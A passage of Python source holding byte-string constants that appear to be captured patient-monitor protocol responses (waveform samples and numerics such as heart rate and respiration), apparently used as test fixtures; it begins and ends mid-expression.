b"\x1f\xfc\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x04\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x03\x20\x09\x20\x0f\x20\x13\x20\x1d\x20\x23" \ b"\x20\x27\x20\x2f\x20\x35\x20\x3d\x20\x43\x20\x4b\x20\x51\x20\x57" \ b"\x20\x5d\x20\x65\x20\x6b\x20\x71\x20\x77\x20\x79\x20\x77\x20\x73" \ b"\x20\x6d\x20\x65\x20\x61\x20\x59\x20\x53\x20\x4b\x20\x43\x20\x3b" \ b"\x20\x35\x20\x2d\x20\x25\x20\x1d\x20\x17\x20\x0f\x20\x07\x20\x01" \ b"\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_9_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x98\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6" \ b"\x1f\xf6\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7" \ b"\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe3" \ b"\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9" \ b"\x1f\xd9\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_10_no_1 = \ b"\xe1\x00\x00\x02\x00\x03" \ b"\x00\x06\x00\x01\x00\x02\x00\x00\x88\x88\x88\x88" rsp_nu_10_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\xcf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_10_no_3 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\xcf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_10_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\xcf\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_10_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x46\x00\x04\x00\x07\x04\x40\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x36\x00\x03\x00\x00\x0e\x80\xa0\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x1c\x00\x00\x00\x04" \ b"\x04\x16\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe1\x1f\xe3" \ b"\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xf6\x1f\xf7\x1f\xf5\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8" \ b"\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xf9" \ b"\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfd" \ b"\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfe\x1f\xff\x20\x00\x1f\xff\x1f\xff" \ b"\x20\x00\x20\x00\x1f\xff\x1f\xfe\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xd9\x1f\xd9\x1f\xdd\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf" \ b"\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe5\x1f\xe5\x1f\xe5\x1f\xe9" \ b"\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xed\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf7" \ b"\x1f\xf7\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x0d\x00\xe0\x09\x21\x00\x02\x07\x8e\x09\x2f" \ 